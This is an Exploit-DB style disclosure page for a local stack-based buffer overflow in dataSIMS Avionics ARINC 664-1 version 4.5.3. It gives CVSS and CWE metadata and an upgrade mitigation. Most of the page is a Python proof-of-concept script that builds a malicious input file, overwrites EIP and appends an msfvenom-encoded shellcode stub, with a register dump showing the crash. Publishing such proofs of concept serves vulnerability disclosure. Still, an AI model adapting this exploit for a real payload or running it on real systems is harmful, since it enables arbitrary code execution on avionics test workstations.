dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)

vendor:

dataSIMS Avionics ARINC 664-1

by:

Kağan Çapar

9.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: dataSIMS Avionics ARINC 664-1

Affected Version From: 4.5.3

Affected Version To: 4.5.3

Patch Exists: YES

Related CWE: N/A

CPE: a:ddc-web:datasims_avionics_arinc_664-1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Enterprise (x64)

2020

dataSIMS Avionics ARINC 664-1 – Local Buffer Overflow (PoC)

A buffer overflow vulnerability exists in dataSIMS Avionics ARINC 664-1 software version 4.5.3. The vulnerability is caused due to a boundary error when handling user-supplied input, specifically when handling a specially crafted MIL-STD-1553 or ARINC 429 testing effort. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted request to the vulnerable application. Successful exploitation could allow attackers to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of dataSIMS Avionics ARINC 664-1 software.

Source

Exploit-DB raw data:

# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)
# Exploit Author:  Kağan Çapar
# Date: 2020-02-17
# Vendor Homepage: https://www.ddc-web.com/
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414
# Version: 4.5.3
# Tested On: Windows 10 Enterprise (x64)
# about Sofware: 
# dataSIMS, an all-in-one Avionics Bus Analysis & Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.
# about ARINC 664-1:
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. 
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).

#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import struct
import binascii
import os
import sys

#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330     ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246

#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!

file = open("milstd1553result.txt", "w")
junk = "\x41" * 600
align = "\x32" * 4 + "\x31" * 4
prop = "\x43" * 380
imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"
imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a"

#EIP Overwrite junk value
overwrite = "\x42" * 4

#Payload size: 29 bytes
#Final size of py file: 160 bytes

#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai

buf =  b""
buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33"
buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9"
buf += b"\x8b\x7c\x9c"

win32 = junk + align + prop + imp + imp2 + overwrite + buf

print len(win32)
file.write(win32)
file.close()